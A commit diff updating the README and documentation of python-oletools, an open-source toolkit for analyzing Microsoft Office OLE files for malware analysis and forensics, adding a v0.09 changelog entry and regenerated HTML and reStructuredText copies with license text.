updated readme and doc

Philippe Lagadec
1 parent d1f62d20
Showing 17 changed files with 1522 additions and 1204 deletions
README.md
oletools/README.html
oletools/README.rst
oletools/doc/Contribute.html
oletools/doc/Home.html
oletools/doc/Home.md
oletools/doc/Install.html
oletools/doc/Install.md
oletools/doc/License.html
oletools/doc/olebrowse.html
oletools/doc/oleid.html
oletools/doc/olemeta.html
oletools/doc/oletimes.html
oletools/doc/olevba.html
oletools/doc/olevba.md
oletools/doc/pyxswf.html
oletools/doc/rtfobj.html
@@ -22,7 +22,9 @@ Note: python-oletools is not related to OLETools published by BeCubed Software.
 News
 ----
  
-- **2015-02-08 v0.08**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings 
+- **2015-03-23 v0.09**: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) now supports Word 2003 XML files,
+added anti-sandboxing/VM detection
+- 2015-02-08 v0.08: [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) can now decode strings 
 obfuscated with Hex/StrReverse/Base64/Dridex and extract IOCs. Added new triage mode, support for non-western
 codepages with olefile 0.42, improved API and display, several bugfixes.
 - 2015-01-05 v0.07: improved [olevba](https://bitbucket.org/decalage/oletools/wiki/olevba) to detect suspicious 
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="python-oletools">python-oletools</h1>
-<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze <a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files</a> (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the <a href="http://www.decalage.info/olefile">olefile</a> parser. See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
-<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> - <a href="https://bitbucket.org/decalage/oletools/wiki/Install">Download/Install</a> - <a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> - <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> - <a href="http://decalage.info/contact">Contact the Author</a> - <a href="https://bitbucket.org/decalage/oletools">Repository</a> - <a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
-<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
-<h2 id="news">News</h2>
-<ul>
-<li><strong>2015-02-08 v0.08</strong>: <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a> can now decode strings obfuscated with Hex/StrReverse/Base64/Dridex and extract IOCs. Added new triage mode, support for non-western codepages with olefile 0.42, improved API and display, several bugfixes.</li>
-<li>2015-01-05 v0.07: improved <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a> to detect suspicious keywords and IOCs in VBA macros, can now scan several files and open password-protected zip archives, added a Python API, upgraded OleFileIO_PL to olefile v0.41</li>
-<li>2014-08-28 v0.06: added <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a>, a new tool to extract VBA Macro source code from MS Office documents (97-2003 and 2007+). Improved <a href="https://bitbucket.org/decalage/oletools/wiki">documentation</a></li>
-<li>2013-07-24 v0.05: added new tools <a href="https://bitbucket.org/decalage/oletools/wiki/olemeta">olemeta</a> and <a href="https://bitbucket.org/decalage/oletools/wiki/oletimes">oletimes</a></li>
-<li>2013-04-18 v0.04: fixed bug in rtfobj, added documentation for <a href="https://bitbucket.org/decalage/oletools/wiki/rtfobj">rtfobj</a></li>
-<li>2012-11-09 v0.03: Improved <a href="https://bitbucket.org/decalage/oletools/wiki/pyxswf">pyxswf</a> to extract Flash objects from RTF</li>
-<li>2012-10-29 v0.02: Added <a href="https://bitbucket.org/decalage/oletools/wiki/oleid">oleid</a></li>
-<li>2012-10-09 v0.01: Initial version of <a href="https://bitbucket.org/decalage/oletools/wiki/olebrowse">olebrowse</a> and pyxswf</li>
-<li>see changelog in source code for more info.</li>
-</ul>
-<h2 id="tools-in-python-oletools">Tools in python-oletools:</h2>
-<ul>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/olebrowse">olebrowse</a>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/oleid">oleid</a>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/olemeta">olemeta</a>: a tool to extract all standard properties (metadata) from OLE files.</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/oletimes">oletimes</a>: a tool to extract creation and modification timestamps of all streams and storages.</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a>: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/pyxswf">pyxswf</a>: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.</li>
-<li><a href="https://bitbucket.org/decalage/oletools/wiki/rtfobj">rtfobj</a>: a tool and python module to extract embedded objects from RTF files.</li>
-<li>and a few others (coming soon)</li>
-</ul>
-<h2 id="download-and-install">Download and Install:</h2>
-<p>To use python-oletools from the command line as analysis tools, you may simply <a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a> and extract the files in the directory of your choice.</p>
-<p>To get the latest development version, click on &quot;Download repository&quot; on the <a href="https://bitbucket.org/decalage/oletools/downloads">downloads page</a>, or use mercurial to clone the repository.</p>
-<p>If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use &quot;<strong>pip install oletools</strong>&quot; or &quot;<strong>easy_install oletools</strong>&quot; to download and install in one go. Otherwise you may download/extract the zip archive and run &quot;<strong>setup.py install</strong>&quot;.</p>
-<h2 id="documentation">Documentation:</h2>
-<p>The latest version of the documentation can be found <a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
-<h2 id="how-to-suggest-improvements-report-issues-or-contribute">How to Suggest Improvements, Report Issues or Contribute:</h2>
-<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
-<p>To suggest improvements, report a bug or any issue, please use the <a href="https://bitbucket.org/decalage/olefileio_pl/issues?status=new&amp;status=open">issue reporting page</a>, providing all the information and files to reproduce the problem.</p>
-<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to provide feedback.</p>
-<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>. You may use it to submit enhancements using forks and pull requests.</p>
-<h2 id="license">License</h2>
-<p>This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.</p>
-<p>The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)</p>
-<p>All rights reserved.</p>
-<p>Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</p>
-<ul>
-<li>Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</li>
-<li>Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</li>
-</ul>
-<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
-<hr />
-<p>olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):</p>
-<p>officeparser is copyright (c) 2014 John William Davison</p>
-<p>Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the &quot;Software&quot;), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:</p>
-<p>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</p>
-<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</p>
-</body>
-</html>
+<h1 id="python-oletools">python-oletools</h1>
+<p><a href="http://www.decalage.info/python/oletools">python-oletools</a> is a package of python tools to analyze <a href="http://en.wikipedia.org/wiki/Compound_File_Binary_Format">Microsoft OLE2 files</a> (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the <a href="http://www.decalage.info/olefile">olefile</a> parser. See <a href="http://www.decalage.info/python/oletools">http://www.decalage.info/python/oletools</a> for more info.</p>
+<p><strong>Quick links:</strong> <a href="http://www.decalage.info/python/oletools">Home page</a> - <a href="https://bitbucket.org/decalage/oletools/wiki/Install">Download/Install</a> - <a href="https://bitbucket.org/decalage/oletools/wiki">Documentation</a> - <a href="https://bitbucket.org/decalage/oletools/issues?status=new&amp;status=open">Report Issues/Suggestions/Questions</a> - <a href="http://decalage.info/contact">Contact the Author</a> - <a href="https://bitbucket.org/decalage/oletools">Repository</a> - <a href="https://twitter.com/decalage2">Updates on Twitter</a></p>
+<p>Note: python-oletools is not related to OLETools published by BeCubed Software.</p>
+<h2 id="news">News</h2>
+<ul>
+<li><strong>2015-03-23 v0.09</strong>: <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a> now supports Word 2003 XML files, added anti-sandboxing/VM detection</li>
+<li>2015-02-08 v0.08: <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a> can now decode strings obfuscated with Hex/StrReverse/Base64/Dridex and extract IOCs. Added new triage mode, support for non-western codepages with olefile 0.42, improved API and display, several bugfixes.</li>
+<li>2015-01-05 v0.07: improved <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a> to detect suspicious keywords and IOCs in VBA macros, can now scan several files and open password-protected zip archives, added a Python API, upgraded OleFileIO_PL to olefile v0.41</li>
+<li>2014-08-28 v0.06: added <a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a>, a new tool to extract VBA Macro source code from MS Office documents (97-2003 and 2007+). Improved <a href="https://bitbucket.org/decalage/oletools/wiki">documentation</a></li>
+<li>2013-07-24 v0.05: added new tools <a href="https://bitbucket.org/decalage/oletools/wiki/olemeta">olemeta</a> and <a href="https://bitbucket.org/decalage/oletools/wiki/oletimes">oletimes</a></li>
+<li>2013-04-18 v0.04: fixed bug in rtfobj, added documentation for <a href="https://bitbucket.org/decalage/oletools/wiki/rtfobj">rtfobj</a></li>
+<li>2012-11-09 v0.03: Improved <a href="https://bitbucket.org/decalage/oletools/wiki/pyxswf">pyxswf</a> to extract Flash objects from RTF</li>
+<li>2012-10-29 v0.02: Added <a href="https://bitbucket.org/decalage/oletools/wiki/oleid">oleid</a></li>
+<li>2012-10-09 v0.01: Initial version of <a href="https://bitbucket.org/decalage/oletools/wiki/olebrowse">olebrowse</a> and pyxswf</li>
+<li>see changelog in source code for more info.</li>
+</ul>
+<h2 id="tools-in-python-oletools">Tools in python-oletools:</h2>
+<ul>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/olebrowse">olebrowse</a>: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/oleid">oleid</a>: a tool to analyze OLE files to detect specific characteristics usually found in malicious files.</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/olemeta">olemeta</a>: a tool to extract all standard properties (metadata) from OLE files.</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/oletimes">oletimes</a>: a tool to extract creation and modification timestamps of all streams and storages.</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/olevba">olevba</a>: a tool to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/pyxswf">pyxswf</a>: a tool to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.</li>
+<li><a href="https://bitbucket.org/decalage/oletools/wiki/rtfobj">rtfobj</a>: a tool and python module to extract embedded objects from RTF files.</li>
+<li>and a few others (coming soon)</li>
+</ul>
+<h2 id="download-and-install">Download and Install:</h2>
+<p>To use python-oletools from the command line as analysis tools, you may simply <a href="https://bitbucket.org/decalage/oletools/downloads">download the zip archive</a> and extract the files in the directory of your choice.</p>
+<p>To get the latest development version, click on &quot;Download repository&quot; on the <a href="https://bitbucket.org/decalage/oletools/downloads">downloads page</a>, or use mercurial to clone the repository.</p>
+<p>If you plan to use python-oletools with other Python applications or your own scripts, then the simplest solution is to use &quot;<strong>pip install oletools</strong>&quot; or &quot;<strong>easy_install oletools</strong>&quot; to download and install in one go. Otherwise you may download/extract the zip archive and run &quot;<strong>setup.py install</strong>&quot;.</p>
+<h2 id="documentation">Documentation:</h2>
+<p>The latest version of the documentation can be found <a href="https://bitbucket.org/decalage/oletools/wiki">online</a>, otherwise a copy is provided in the doc subfolder of the package.</p>
+<h2 id="how-to-suggest-improvements-report-issues-or-contribute">How to Suggest Improvements, Report Issues or Contribute:</h2>
+<p>This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.</p>
+<p>To suggest improvements, report a bug or any issue, please use the <a href="https://bitbucket.org/decalage/olefileio_pl/issues?status=new&amp;status=open">issue reporting page</a>, providing all the information and files to reproduce the problem.</p>
+<p>You may also <a href="http://decalage.info/contact">contact the author</a> directly to provide feedback.</p>
+<p>The code is available in <a href="https://bitbucket.org/decalage/oletools">a Mercurial repository on Bitbucket</a>. You may use it to submit enhancements using forks and pull requests.</p>
+<h2 id="license">License</h2>
+<p>This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.</p>
+<p>The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec (http://www.decalage.info)</p>
+<p>All rights reserved.</p>
+<p>Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:</p>
+<ul>
+<li>Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.</li>
+<li>Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.</li>
+</ul>
+<p>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</p>
+<hr />
+<p>olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):</p>
+<p>officeparser is copyright (c) 2014 John William Davison</p>
+<p>Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the &quot;Software&quot;), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:</p>
+<p>The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.</p>
+<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.</p>
-python-oletools
-===============
-
-`python-oletools <http://www.decalage.info/python/oletools>`_ is a
-package of python tools to analyze `Microsoft OLE2
-files <http://en.wikipedia.org/wiki/Compound_File_Binary_Format>`_ (also
-called Structured Storage, Compound File Binary Format or Compound
-Document File Format), such as Microsoft Office documents or Outlook
-messages, mainly for malware analysis, forensics and debugging. It is
-based on the `olefile <http://www.decalage.info/olefile>`_ parser. See
-`http://www.decalage.info/python/oletools <http://www.decalage.info/python/oletools>`_
-for more info.
-
-**Quick links:** `Home page <http://www.decalage.info/python/oletools>`_
--
-`Download/Install <https://bitbucket.org/decalage/oletools/wiki/Install>`_
-- `Documentation <https://bitbucket.org/decalage/oletools/wiki>`_ -
-`Report
-Issues/Suggestions/Questions <https://bitbucket.org/decalage/oletools/issues?status=new&status=open>`_
-- `Contact the Author <http://decalage.info/contact>`_ -
-`Repository <https://bitbucket.org/decalage/oletools>`_ - `Updates on
-Twitter <https://twitter.com/decalage2>`_
-
-Note: python-oletools is not related to OLETools published by BeCubed
-Software.
-
-News
-----
-
--  **2015-02-08 v0.08**:
-   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`_ can
-   now decode strings obfuscated with Hex/StrReverse/Base64/Dridex and
-   extract IOCs. Added new triage mode, support for non-western
-   codepages with olefile 0.42, improved API and display, several
-   bugfixes.
--  2015-01-05 v0.07: improved
-   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`_ to
-   detect suspicious keywords and IOCs in VBA macros, can now scan
-   several files and open password-protected zip archives, added a
-   Python API, upgraded OleFileIO\_PL to olefile v0.41
--  2014-08-28 v0.06: added
-   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`_, a
-   new tool to extract VBA Macro source code from MS Office documents
-   (97-2003 and 2007+). Improved
-   `documentation <https://bitbucket.org/decalage/oletools/wiki>`_
--  2013-07-24 v0.05: added new tools
-   `olemeta <https://bitbucket.org/decalage/oletools/wiki/olemeta>`_ and
-   `oletimes <https://bitbucket.org/decalage/oletools/wiki/oletimes>`_
--  2013-04-18 v0.04: fixed bug in rtfobj, added documentation for
-   `rtfobj <https://bitbucket.org/decalage/oletools/wiki/rtfobj>`_
--  2012-11-09 v0.03: Improved
-   `pyxswf <https://bitbucket.org/decalage/oletools/wiki/pyxswf>`_ to
-   extract Flash objects from RTF
--  2012-10-29 v0.02: Added
-   `oleid <https://bitbucket.org/decalage/oletools/wiki/oleid>`_
--  2012-10-09 v0.01: Initial version of
-   `olebrowse <https://bitbucket.org/decalage/oletools/wiki/olebrowse>`_
-   and pyxswf
--  see changelog in source code for more info.
-
-Tools in python-oletools:
--------------------------
-
--  `olebrowse <https://bitbucket.org/decalage/oletools/wiki/olebrowse>`_:
-   A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint
-   documents), to view and extract individual data streams.
--  `oleid <https://bitbucket.org/decalage/oletools/wiki/oleid>`_: a tool
-   to analyze OLE files to detect specific characteristics usually found
-   in malicious files.
--  `olemeta <https://bitbucket.org/decalage/oletools/wiki/olemeta>`_: a
-   tool to extract all standard properties (metadata) from OLE files.
--  `oletimes <https://bitbucket.org/decalage/oletools/wiki/oletimes>`_:
-   a tool to extract creation and modification timestamps of all streams
-   and storages.
--  `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`_: a
-   tool to extract and analyze VBA Macro source code from MS Office
-   documents (OLE and OpenXML).
--  `pyxswf <https://bitbucket.org/decalage/oletools/wiki/pyxswf>`_: a
-   tool to detect, extract and analyze Flash objects (SWF) that may be
-   embedded in files such as MS Office documents (e.g. Word, Excel) and
-   RTF, which is especially useful for malware analysis.
--  `rtfobj <https://bitbucket.org/decalage/oletools/wiki/rtfobj>`_: a
-   tool and python module to extract embedded objects from RTF files.
--  and a few others (coming soon)
-
-Download and Install:
----------------------
-
-To use python-oletools from the command line as analysis tools, you may
-simply `download the zip
-archive <https://bitbucket.org/decalage/oletools/downloads>`_ and
-extract the files in the directory of your choice.
-
-To get the latest development version, click on "Download repository" on
-the `downloads
-page <https://bitbucket.org/decalage/oletools/downloads>`_, or use
-mercurial to clone the repository.
-
-If you plan to use python-oletools with other Python applications or
-your own scripts, then the simplest solution is to use "**pip install
-oletools**\ " or "**easy\_install oletools**\ " to download and install
-in one go. Otherwise you may download/extract the zip archive and run
-"**setup.py install**\ ".
-
-Documentation:
---------------
-
-The latest version of the documentation can be found
-`online <https://bitbucket.org/decalage/oletools/wiki>`_, otherwise a
-copy is provided in the doc subfolder of the package.
-
-How to Suggest Improvements, Report Issues or Contribute:
----------------------------------------------------------
-
-This is a personal open-source project, developed on my spare time. Any
-contribution, suggestion, feedback or bug report is welcome.
-
-To suggest improvements, report a bug or any issue, please use the
-`issue reporting
-page <https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open>`_,
-providing all the information and files to reproduce the problem.
-
-You may also `contact the author <http://decalage.info/contact>`_
-directly to provide feedback.
-
-The code is available in `a Mercurial repository on
-Bitbucket <https://bitbucket.org/decalage/oletools>`_. You may use it to
-submit enhancements using forks and pull requests.
-
-License
--------
-
-This license applies to the python-oletools package, apart from the
-thirdparty folder which contains third-party files published with their
-own license.
-
-The python-oletools package is copyright (c) 2012-2015 Philippe Lagadec
-(http://www.decalage.info)
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
--  Redistributions of source code must retain the above copyright
-   notice, this list of conditions and the following disclaimer.
--  Redistributions in binary form must reproduce the above copyright
-   notice, this list of conditions and the following disclaimer in the
-   documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
-IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
-TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
-PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
-TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
---------------
-
-olevba contains modified source code from the officeparser project,
-published under the following MIT License (MIT):
-
-officeparser is copyright (c) 2014 John William Davison
-
-Permission is hereby granted, free of charge, to any person obtaining a
-copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be included
-in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
-OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
-CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
-TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
-SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+python-oletools
+===============
+
+`python-oletools <http://www.decalage.info/python/oletools>`__ is a
+package of python tools to analyze `Microsoft OLE2
+files <http://en.wikipedia.org/wiki/Compound_File_Binary_Format>`__
+(also called Structured Storage, Compound File Binary Format or Compound
+Document File Format), such as Microsoft Office documents or Outlook
+messages, mainly for malware analysis, forensics and debugging. It is
+based on the `olefile <http://www.decalage.info/olefile>`__ parser. See
+http://www.decalage.info/python/oletools for more info.
+
+**Quick links:** `Home
+page <http://www.decalage.info/python/oletools>`__ -
+`Download/Install <https://bitbucket.org/decalage/oletools/wiki/Install>`__
+- `Documentation <https://bitbucket.org/decalage/oletools/wiki>`__ -
+`Report
+Issues/Suggestions/Questions <https://bitbucket.org/decalage/oletools/issues?status=new&status=open>`__
+- `Contact the Author <http://decalage.info/contact>`__ -
+`Repository <https://bitbucket.org/decalage/oletools>`__ - `Updates on
+Twitter <https://twitter.com/decalage2>`__
+
+Note: python-oletools is not related to OLETools published by BeCubed
+Software.
+
+News
+----
+
+-  **2015-03-23 v0.09**:
+   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`__ now
+   supports Word 2003 XML files, added anti-sandboxing/VM detection
+-  2015-02-08 v0.08:
+   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`__ can
+   now decode strings obfuscated with Hex/StrReverse/Base64/Dridex and
+   extract IOCs. Added new triage mode, support for non-western
+   codepages with olefile 0.42, improved API and display, several
+   bugfixes.
+-  2015-01-05 v0.07: improved
+   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`__ to
+   detect suspicious keywords and IOCs in VBA macros, can now scan
+   several files and open password-protected zip archives, added a
+   Python API, upgraded OleFileIO\_PL to olefile v0.41
+-  2014-08-28 v0.06: added
+   `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`__, a
+   new tool to extract VBA Macro source code from MS Office documents
+   (97-2003 and 2007+). Improved
+   `documentation <https://bitbucket.org/decalage/oletools/wiki>`__
+-  2013-07-24 v0.05: added new tools
+   `olemeta <https://bitbucket.org/decalage/oletools/wiki/olemeta>`__
+   and
+   `oletimes <https://bitbucket.org/decalage/oletools/wiki/oletimes>`__
+-  2013-04-18 v0.04: fixed bug in rtfobj, added documentation for
+   `rtfobj <https://bitbucket.org/decalage/oletools/wiki/rtfobj>`__
+-  2012-11-09 v0.03: Improved
+   `pyxswf <https://bitbucket.org/decalage/oletools/wiki/pyxswf>`__ to
+   extract Flash objects from RTF
+-  2012-10-29 v0.02: Added
+   `oleid <https://bitbucket.org/decalage/oletools/wiki/oleid>`__
+-  2012-10-09 v0.01: Initial version of
+   `olebrowse <https://bitbucket.org/decalage/oletools/wiki/olebrowse>`__
+   and pyxswf
+-  see changelog in source code for more info.
+
+Tools in python-oletools:
+-------------------------
+
+-  `olebrowse <https://bitbucket.org/decalage/oletools/wiki/olebrowse>`__:
+   A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint
+   documents), to view and extract individual data streams.
+-  `oleid <https://bitbucket.org/decalage/oletools/wiki/oleid>`__: a
+   tool to analyze OLE files to detect specific characteristics usually
+   found in malicious files.
+-  `olemeta <https://bitbucket.org/decalage/oletools/wiki/olemeta>`__: a
+   tool to extract all standard properties (metadata) from OLE files.
+-  `oletimes <https://bitbucket.org/decalage/oletools/wiki/oletimes>`__:
+   a tool to extract creation and modification timestamps of all streams
+   and storages.
+-  `olevba <https://bitbucket.org/decalage/oletools/wiki/olevba>`__: a
+   tool to extract and analyze VBA Macro source code from MS Office
+   documents (OLE and OpenXML).
+-  `pyxswf <https://bitbucket.org/decalage/oletools/wiki/pyxswf>`__: a
+   tool to detect, extract and analyze Flash objects (SWF) that may be
+   embedded in files such as MS Office documents (e.g. Word, Excel) and
